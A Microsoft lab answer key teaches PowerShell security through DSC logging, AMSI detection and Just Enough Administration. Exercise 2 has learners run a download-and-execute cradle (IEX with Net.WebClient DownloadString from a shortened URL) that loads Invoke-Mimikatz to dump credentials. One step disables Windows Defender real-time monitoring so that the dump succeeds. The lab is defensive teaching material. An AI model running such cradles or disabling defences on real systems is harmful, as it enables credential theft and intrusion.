# Lab Answer Key: Microsoft Security Workshop: Implementing Windows PowerShell Security 
# Lab 1: Implementing Windows PowerShell Security

## Exercise 1: Implement Windows PowerShell Logging by using Desired State Configuration (DSC)

  > **Note:**  In an Active Directory environment, the recommended approach to implementing consistent Windows PowerShell logging settings would rely on the Group Policy capabilities. This approach is documented in Script Tracing and Logging at https://docs.microsoft.com/en-us/powershell/wmf/5.0/audit_script. The DSC-based implementation is recommended in scenarios that involve workgroup systems. The primary reason it is included in this lab since it provides an example of a push-based deployment of a DSC configuration.

#### Task 1: Compile DSC configuration 

1.   Sign to the LON-CL1 Windows 10 lab virtual machine with the following credentials:

  -   Username: **ADATUM\\Administrator**
  -   Password: **Pa55w.rd**

2.   While signed in to LON-CL1 as **ADATUM\\Administrator**, click **Start**, in the **Start** menu, expand the **Windows Accessories** folder, and click **Internet Explorer**.
3.   When prompted, in the **Set up Internet Explorer 11** window, select the option **Use recommended security and compatibility settings** option, and click **OK**.

  > **Note:**  This is necessary in order to successfully run the **Invoke-WebRequest** cmdlet, which requires that the first-launch configuration of Internet Explorer is complete.

4.   Click **Start**, in the **Start** menu, expand the **Windows PowerShell** folder, right-click **Windows PowerShell ISE**, click **More** and then click **Run as administrator**. 
5.   In the script pane of the **Administrator: Windows PowerShell ISE** window, type and execute the following (F:\\LabFiles\\Scripts\\Lab1Ex1Task1-01.ps1):

```
$dscConfigScriptPageRaw = Invoke-WebRequest –Uri ` 'https://raw.githubusercontent.com/GoateePFE/BlogScripts/master/PSSecDSC.ps1'
```

  > **Note:**  The target URI contains a sample DSC configuration that implements Windows PowerShell script block and transcription logging. 

6.   To create the configuration script, in the script pane of the **Administrator: Windows PowerShell ISE** window, type and execute the following (F:\\LabFiles\\Scripts\\Lab1Ex1Task1-02.ps1):

```
If (!(Test-Path –Path 'C:\Temp')) {
         New-Item –Path 'C:\Temp' –ItemType Directory –Force
}

Out-File –FilePath C:\Temp\PSDscConfig.ps1 `
         –InputObject $dscConfigScriptPageRaw.Content `
         -Force

```

7.   To modify the newly created configuration script, in the **Administrator: Windows PowerShell ISE** window, click **File**, in the File menu, click **Open**, in the **Open** dialog box, navigate to the **C:\\Temp** folder, click **PSDscConfig.ps1** and click **Open**.
8.   In the **Administrator: Windows PowerShell ISE** window, add a comma at the end of the line 55 stating:

```
$EventLogSizeInMB = 50
```
and add two following lines directly below it, resulting in the following:

```
$EventLogSizeInMB = 50,
[string[]]
$NodeName = $env:computername
```

9.   In the **Administrator: Windows PowerShell ISE** window, replace the entry in the line 62 stating:

```
Node localhost
```

with the entry `Node $NodeName`, resulting in the following:

```
Node $NodeName
```

10.   In the **Administrator: Windows PowerShell ISE** window, at the end of the line 225 stating:

```
EnablePowerShellLogging
```

add `-NodeName ('LON-CL1','LON-SVR1','LON-DC1')`, resulting in the following:

```
EnablePowerShellLogging -NodeName ('LON-CL1','LON-SVR1','LON-DC1')
```

11.   In the **Administrator: Windows PowerShell ISE** window, select the content of the script from the line 45 stating:

```
Configuration EnablePowerShellLogging
```

down to and including the line 225 stating:

```
EnablePowerShellLogging -NodeName ('LON-CL1','LON-SVR1','LON-DC1')
```

12.   Execute the selected portion of the script by pressing the **F8** key or clicking the **Run selection** button in the toolbar. This will generate three MOF files named **LON-CL1.mof**, **LON-SVR1.mof**, and **LON-DC1.mof** in the **C:\\temp\\EnablePowerShellLogging** folder.


#### Task 2: Push DSC Configuration

1.   While signed in to LON-CL1 as **ADATUM\\Administrator**, from the console pane of the **Administrator: Windows PowerShell ISE** window, type and execute the following (F:\\LabFiles\\Scripts\\Lab1Ex1Task2-01.ps1):

```
@('LON-CL1','LON-SVR1','LON-DC1') | Start-DscConfiguration –Path 'C:\temp\EnablePowerShellLogging' –Wait –Verbose -Force
```

  > **Note:**  You could also simply run `Start-DscConfiguration` with the `–Path` parameter set to `C:\\temp\\EnablePowerShellLogging`. Note that this will apply the configuration to all computers which names match the names of the MOF files in that location. 

2.   Wait till the execution of the Start-DscConfiguration cmdlet has completed. 
3.   To verify that the configuration has been applied on LON-CL1, from the console pane of the **Administrator: Windows PowerShell ISE** window, type and execute the following:

```
Get-DscConfiguration
```

4.   To verify that the configuration has been applied on LON-SVR1, from the console pane of the **Administrator: Windows PowerShell ISE** window, type and execute the following:

```
Invoke-Command –ComputerName LON-SVR1 {Get-DscConfiguration}
```


> **Result**: After completing this exercise, you will have implemented Windows PowerShell Logging by using Desired State Configuration.


## Exercise 2: Attempt a Windows PowerShell-based exploit

#### Task 1: Add a domain user to the local Administrators group.

  > **Note:**  At this point, you are logged on as a member of the Domain Admins group. In order to illustrate a more common exploit scenario, you will operate as a member of local Administrators group on domain member computers. To prepare for this scenario, you will add an existing domain user account **ADATUM\\Beth** to the local Administrators group on LON-CL1 and LON-SVR1.

1.   Ensure that you are signed in to the LON-CL1 Windows 10 Professional lab virtual machine with the following credentials:

  -   USERNAME: **ADATUM\\Administrator**
  -   PASSWORD: **Pa55w.rd**

2.   In the script pane of the **Administrator: Windows PowerShell ISE** window, type and execute the following (F:\\LabFiles\\Scripts\\Lab1Ex2Task1-01.ps1):

```
Invoke-Command –ComputerName 'LON-CL1','LON-SVR1' `
               -ScriptBlock {
                     Add-LocalGroupMember –Group 'Administrators' `
                                           –Member 'ADATUM\Beth'
               }
```

3.   Sign out from LON-CL1.


#### Task 2: Attempt a Windows PowerShell exploit on a Window 10 Professional computer

  > **Note:**  You will start by attempting an exploit that employs the PowerSploit (PowerShell Post-Exploitation Framework) functionality to run the **Invoke-Mimikatz** cmdlet on a Windows 10 computer. The PowerSploit module containing this cmdlet is loaded directly into memory by taking advantage of download cradle. **Invoke-Mimikatz**, in turn, takes advantage of **Invoke-ReflectivePEInjection** (which is also part of PowerSploit) in order to reflectively load Mimikatz directly into memory. Once successfully executed, Mimikatz allows an attacker to dump credentials from the Local Security Authority Subsystem Service (LSASS) on the computer targeted by the cmdlet. 

1.   Sign in to the LON-CL1 Windows 10 Professional lab virtual machine with the following credentials:

  -   USERNAME: **ADATUM\\Beth**
  -   PASSWORD: **Pa55w.rd**

2.   Click **Start**, in the **Start** menu, expand the **Windows Accessories** folder, and click **Internet Explorer**.
3.   Right-click **Start** and in the right-click menu, click **Windows PowerShell (Admin)**.
4.   When prompted, in the **User Account Control** dialog box, click **Yes**.
5.   From the **Administrator: Windows PowerShell** window, type and execute the following (F:\\LabFiles\\Scripts\\Lab1Ex2Task2-01.ps1):

```
IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('LON-CL1')
```

6.   Note the resulting error message. The attempt to download and execute malicious script is blocked by Windows Defender. To verify this, right-click **Start** and click **Event Viewer**.
7.   In the Event Viewer window, expand the **Applications and Services\\Microsoft\\Windows\\Windows Defender** folder and click the **Operational** log.
8.   In the list of events in the Windows Defender Operational log, locate the most recent event **ID 1116** with the **Warning** level and double-click it.
8.   On the **General** tab of the event properties, scroll down through its description and note that the **Detection Source** is set to **AMSI**.



#### Task 3: Attempt a remote Windows PowerShell exploit on a Window Server 2016 computer

  > **Note:**  Now you will attempt the same exploit that employs the PowerSploit (PowerShell Post-Exploitation Framework) functionality to run the **Invoke-Mimikatz** cmdlet on a remote Windows Server 2016 computer. **Invoke-Mimikatz** supports targeting remote computers via Windows PowerShell Remoting.

1.   Sign in to the LON-SVR1 Windows Server 2016 lab virtual machine with the following credentials:

  -   USERNAME: **ADATUM\\Administrator**
  -   PASSWORD: **Pa55w.rd**

  > **Note:**  You sign in to LON-SVR1 as **ADATUM\\Administrator** in order to observe in the subsequent steps of this task how an attacker can compromise its credentials. In general, you should avoid signing in with accounts that are members of the **Domain Admins** group to domain member computers.

2.   Ensure that you are signed on to the LON-CL1 Windows 10 Professional lab virtual machine with the following credentials:

  -   USERNAME: **ADATUM\\Beth**
  -   PASSWORD: **Pa55w.rd**

3.   From the **Administrator: Windows PowerShell** window, type and execute the following (F:\\LabFiles\\Scripts\\Lab1Ex2Task3-01.ps1):

```
IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('LON-SVR1')
```

4.   Note the resulting error message. The attempt to download and execute malicious script is blocked again by Windows Defender. To verify this, switch back to the Event Viewer window and refresh the view of the Windows Defender Operational log.
5.   In the list of events in the Windows Defender Operational log, locate the most recent event ID 1116 with the Warning level and double-click it.
6.   On the General tab of the event properties, scroll down through its description and note that the Detection Source is set to AMSI.

  > **Note:**  As you can see, AMSI in combination with Windows Defender successfully blocked execution of the malicious script. Now you will attempt the same exploit directly from a Windows PowerShell remoting session to LON-SVR1

7.   From the **Administrator: Windows PowerShell** window, type and execute the following:

```
Enter-PSSession –ComputerName LON-SVR1
```

  > **Note:**  This will establish a Windows PowerShell Remoting session to LON-SVR1, as indicated by the [LON-SVR1]: prefix of the Windows PowerShell prompt.

8.   From the **Administrator: Windows PowerShell ISE** window, type and execute the following:

```
Set-MpPreference -DisableRealtimeMonitoring
```

  > **Note:**  This will disable Real Time Protection of Windows Defender. 

9.   From the **Administrator: Windows PowerShell ISE** window, type and execute the following:

```
IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds
```

  > **Note:**  The exploit this time succeeded, providing the listing of cached credentials, including the NTLM password hash of the **ADATUM\\Administrator** user account. 

  > **Note:**  Obviously, as a member of the local Administrators group, you could have applied the same approach and disable Windows Defender Real Time Protection on the Windows 10 computer, however, this would not give you access to the NTLM password hash of the **ADATUM\\Administrator** user account. 

10.   While the exploit succeeded, the corresponding actions were recorded in Windows PowerShell Operational log on LON-SVR1. To verify that, switch to LON-SVR1 where you are signed in as **ADATUM\\Administrator**. 
11.   While signed in to LON-SVR1 as **ADATUM\\Administrator**, right-click **Start** and click **Event Viewer**.
12.   In the **Event Viewer** window, expand the **Applications and Services\\Microsoft\\Windows\\PowerShell** folder and click the entry representing the Operational log.
13.   In the list of events in the Operational log, locate the most recent events with **ID 4104** and examine their content. 
14.   Locate the event that includes a reference to the script block `IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('LON-SVR1')`.

  > **Note:**  You could also mitigate the threat of a Pass-the-Hash attack in an Active Directory environment by implementing such features as Protected Groups, Authentication Policies, and Authentication Silos. For more information regarding these topics, refer to https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/how-to-configure-protected-accounts and https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/authentication-policies-and-authentication-policy-silos


> **Result**: After completing this exercise, you will have attempted Windows PowerShell-based attacks against Windows 10 and Windows Server 2016 computers.


## Exercise 3: Implement Just Enough Administration

#### Task 1: Create a JEA role capabilities file

1.   Make sure that you are signed in to the LON-SVR1 Windows Server 2016 lab virtual machine with the following credentials:

  -   USERNAME: **ADATUM\\Administrator**
  -   PASSWORD: **Pa55w.rd**

2.   click **Start**, in the **Start** menu, right-click **Windows PowerShell ISE**, in the right-click menu, click **More** and then click **Run as administrator**.
3.   From the **Administrator: Windows PowerShell ISE** window, run the following (F:\\LabFiles\\Scripts\\Lab1Ex3Task1-01.ps1):

```
If (!(Test-Path –Path 'C:\Temp')) {
         New-Item –Path 'C:\Temp' –ItemType Directory –Force
}

New-PSRoleCapabilityFile –Path 'C:\Temp\AdatumPrintServerAdmin.psrc'
```

  > **Note:**  This will generate a sample JEA role capabilities file. With its default settings, all of the settings are commented out, resulting in no impact on the configuration of the endpoint with which the file gets associated. You will modify the role capabilities file to allow only restarting of the Print Spooler service. 

4.   Open the newly created capabilities file in the script pane of **Administrator: Windows PowerShell ISE** window.
5.   In line 10 of the role capabilities file, change:

```
# Description = ''
```

to

```
Description = 'Adatum Print Server Administration'
```

6.   In line 13 of the role capabilities file, change:

```
CompanyName = 'Unknown'
```

to

```
CompanyName = 'Adatum'
```

7.   In line 25 of the role capabilities file, change:

```
# VisibleCmdlets = 'Invoke-Cmdlet1', @{ Name = 'Invoke-Cmdlet2'; Parameters = @{ Name = 'Parameter1'; ValidateSet = 'Item1', 'Item2' }, @{ Name = 'Parameter2'; ValidatePattern = 'L*' } }
```

to

```
VisibleCmdlets = @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Print Spooler'} }
```

8.   In line 31 of the role capabilities file, change:

```
# VisibleExternalCommands = 'Item1', 'Item2'
```

to

```
VisibleExternalCommands = 'C:\Windows\System32\whoami.exe'
```

  > **Note:**  We include whoami strictly for demonstration purposes. Typically, there should be no need to allow this executable.

9.   Save the changes and close the file. 

  > **Note:**  Typically, you would define multiple roles by repeating steps 3-9 to create multiple role capabilities files. You will be able to associate these roles with the same JEA endpoint by following the procedure in the next task.

  > **Note:**  In order for PowerShell to find role capability files, they must be stored in a "RoleCapabilities" folder in a PowerShell module. The module can be stored in any folder included in the $env:PSModulePath environment variable, however you should not place it in System32 (reserved for built-in modules) or a folder where the untrusted, connecting users could modify the files. In this lab, you will use for this purpose a PowerShell script module called AdatumJEA in the Program Files path.

10.   From the **Administrator: Windows PowerShell ISE** window, run the following (F:\\LabFiles\\Scripts\\Lab1Ex3Task1-02.ps1):

```
# Create a folder for the module
$modulePath = Join-Path $env:ProgramFiles "WindowsPowerShell\Modules\AdatumJEA"
New-Item -ItemType Directory -Path $modulePath

# Create an empty script module and module manifest. At least one file in the module folder must have the same name as the folder itself.
New-Item -ItemType File -Path (Join-Path $modulePath "AdatumJEA.psm1")
New-ModuleManifest -Path (Join-Path $modulePath "AdatumJEA.psd1") -RootModule "AdatumJEA.psm1"

# Create the RoleCapabilities folder and copy in the PSRC file(s)
$rcFolder = Join-Path $modulePath "RoleCapabilities"
New-Item -ItemType Directory $rcFolder
Copy-Item -Path 'C:\Temp\AdatumPrintServerAdmin.psrc' -Destination $rcFolder
```


#### Task 2: Create and register JEA session configuration file

1.   Make sure that you are signed in to the LON-SVR1 Windows Server 2016 lab virtual machine with the following credentials:

  -   USERNAME: **ADATUM\\Administrator**
  -   PASSWORD: **Pa55w.rd**

2.   From the **Administrator: Windows PowerShell ISE** window, run the following (F:\\LabFiles\\Scripts\\Lab1Ex3Task2-01.ps1):

```
New-PSSessionConfigurationFile –SessionType RestrictedRemoteServer `
                               –Path 'C:\Temp\AdatumAdminRestricted.pssc'
```

  > **Note:**  This will generate a sample JEA session configuration file. Since the `-SessionType` parameter was set to `RestrictedRemoteServer`, the resulting settings include the most common configuration options applicable to JEA-based delegated management. We will modify the session configuration file to further customize the resulting behavior. The resulting settings configured this way include:
  -   NoLanguage mode
  -   No Windows PowerShell providers
  -   No external programs (executables, scripts, etc.)
  -   Total of 8 available commands and aliases: 
      -   Clear-Host (cls, clear)
      -   Exit-PSSession (exsn, exit)
      -   Get-Command (gcm)
      -   Get-FormatData
      -   Get-Help
      -   Measure-Object (measure)
      -   Out-Default
      -   Select-Object (select)

3.   Open the newly created capabilities file **C:\\Temp\\AdatumAdminRestricted.pssc** in the script pane of **Administrator: Windows PowerShell ISE** window.
4.   In line 13 of the role capabilities file, change:

```
# Description = ''
```

to

```
Description = 'Adatum Restricted Administration'
```

5.   In line 22 of the role capabilities file, change:

```
# RunAsVirtualAccount = $true
```

to

```
RunAsVirtualAccount = $true
```

6.   In line 28 of the role capabilities file, change:

```
# RoleDefinitions = @{ 'CONTOSO\SqlAdmins' = @{ RoleCapabilities = 'SqlAdministration' }; 'CONTOSO\ServerMonitors' = @{ VisibleCmdlets = 'Get-Process' } }
```

to

```
RoleDefinitions = @{ 'ADATUM\IT' = @{ RoleCapabilities = 'AdatumPrintServerAdmin' }}
```

  > **Note:**  In this case, you are leveraging an existing group that the delegated admin (**ADATUM\\Beth**) is already a member of. Alternatively, you could create a new group. The name of the role capabilities entry matches the name of the role capabilities file you created in the previous task (without the .psrc extension)

7.   Starting at line 30 of the role capabilities file, add the following entries:

```
LanguageMode = 'NoLanguage'
ExecutionPolicy = 'Restricted'
PowerShellVersion = '5.1.14393.206'
```

8.   Ensure that the last line contains the closing braces, save the changes and close the file.

  > **Note:**  Next, you need to register the JEA session configuration file, which will result in creation of a new Windows PowerShell Remoting endpoint.

9.   From the **Administrator: Windows PowerShell ISE** window, run the following:

```
$modulePath = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\AdatumJEA'
$scFolder = Join-Path $modulePath 'RoleCapabilities'
Copy-Item –Path 'C:\Temp\AdatumAdminRestricted.pssc' –Destination $scFolder
$scFile = Join-Path $scFolder 'AdatumAdminRestricted.pssc'
Register-PSSessionConfiguration -Path $scFile -Name 'adatum.admin.restricted' -Force
```

10.   Verify that the `Register-PSSessionConfiguration` cmdlet completed successfully. The output should contain the name of the new endpoint (adatum.admin.restricted).



#### Task 3: Test JEA

  > **Note:**  Now you will attempt again the same exploit that employs the PowerSploit (PowerShell Post-Exploitation Framework) functionality to run the Invoke-Mimikatz cmdlet which was successfully carried out in a Windows PowerShell remoting session to the Windows Server 2016 computer. 

1.   Ensure that you are signed on to the LON-CL1 Windows 10 Professional lab virtual machine with the following credentials:

  -   USERNAME: **ADATUM\\Beth**
  -   PASSWORD: **Pa55w.rd**

2.   Right-click **Start** and in the right-click menu, click **Windows PowerShell (Admin)**.
3.   When prompted, in the **User Account Control** dialog box, click **Yes**.
4.   From the **Administrator: Windows PowerShell** window, type and execute the following:

```
Enter-PSSession –ComputerName 'LON-SVR1' `
                –ConfigurationName 'adatum.admin.restricted'
```

  > **Note:**  This will establish a Windows PowerShell Remoting session to LON-SVR1, as indicated by the `[LON-SVR1]:` prefix of the Windows PowerShell prompt.

5.   From the **Administrator: Windows PowerShell** window, type and execute the following:

```
IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds
```

  > **Note:**  The exploit failed again, but this time, as the error message indicates, the command execution failed since it was executed in the runspace that does not support the NoLanguage mode. Obviously in order for this protection method to provide expected resiliency, you would need to also remove the default Windows PowerShell Remoting endpoint. While this is easy to accomplish by running the Disable-PSSessionConfiguration cmdlet on the target computer, such step has obvious implications in regard to remote administration, so remediating its impact should be carefully evaluated. 

6.   From the **Administrator: Windows PowerShell** window, type and execute the following:

```
Restart-Service –Name 'Print Spooler'
```

  > **Note:**  The command should not return any error messages.

7.   To verify that the execution of the Restart-Service cmdlet has been successful, switch to the console session to LON-SVR1, within the console session switch to **Event Viewer**, navigate to the **System** log in the **Windows Logs** folder and locate the most recent events with the **Event ID 7036**, representing the Print Spooler service entering first the stopped state and next the running state.
8.   Switch back to LON-CL1 and, from the **Administrator: Windows PowerShell** window, type and execute the following:

```
Restart-Service –Name 'Server'
```

  > **Note:**  Note the resulting error message, indicating that the value of the parameter Name cannot be validated. This is expected, since the role capabilities definition restricts the value of this parameter to the Print Spooler service.

9.   From the **Administrator: Windows PowerShell** window, type and execute the following:

```
whoami
```

  > **Note:**  Note that you are running the remote session in the security context of a virtual account, rather than **ADATUM\\Beth** user account. 

10.   From the **Administrator: Windows PowerShell** window, type and execute the following:

```
whoami /groups
```

  > **Note:**  Note that the account you are using is a member of the local Administrators group. In order to further secure the remoting session, rather than relying on a virtual account, you could instead create a local group on LON-SVR1, grant the permissions to restart the Print Spooler service to this group (note that the local Print Operators group would not suffice in this case, since members of this group do not have permissions to restart the Print Spooler service), and include the reference to this group in the session configuration file by adding the entry `RunAsVirtualAccountGroups = 'Delegated_Group_Name'`. As the result, the virtual account that would provide security context for the remoting session would no longer be a member of the local Administrators group.


> **Result**: After completing this exercise, you will have implemented JEA. 


©2016 Microsoft Corporation. All rights reserved.

The text in this document is available under the [Creative Commons Attribution 3.0 License](https://creativecommons.org/licenses/by/3.0/legalcode "Creative Commons Attribution 3.0 License"), additional terms may apply.  All other content contained in this document (including, without limitation, trademarks, logos, images, etc.) are **not** included within the Creative Commons license grant.  This document does not provide you with any legal rights to any intellectual property in any Microsoft product. You may copy and use this document for your internal, reference purposes.

This document is provided "as-is." Information and views expressed in this document, including URL and other Internet Web site references, may change without notice. You bear the risk of using it. Some examples are for illustration only and are fictitious. No real association is intended or inferred. Microsoft makes no warranties, express or implied, with respect to the information provided here.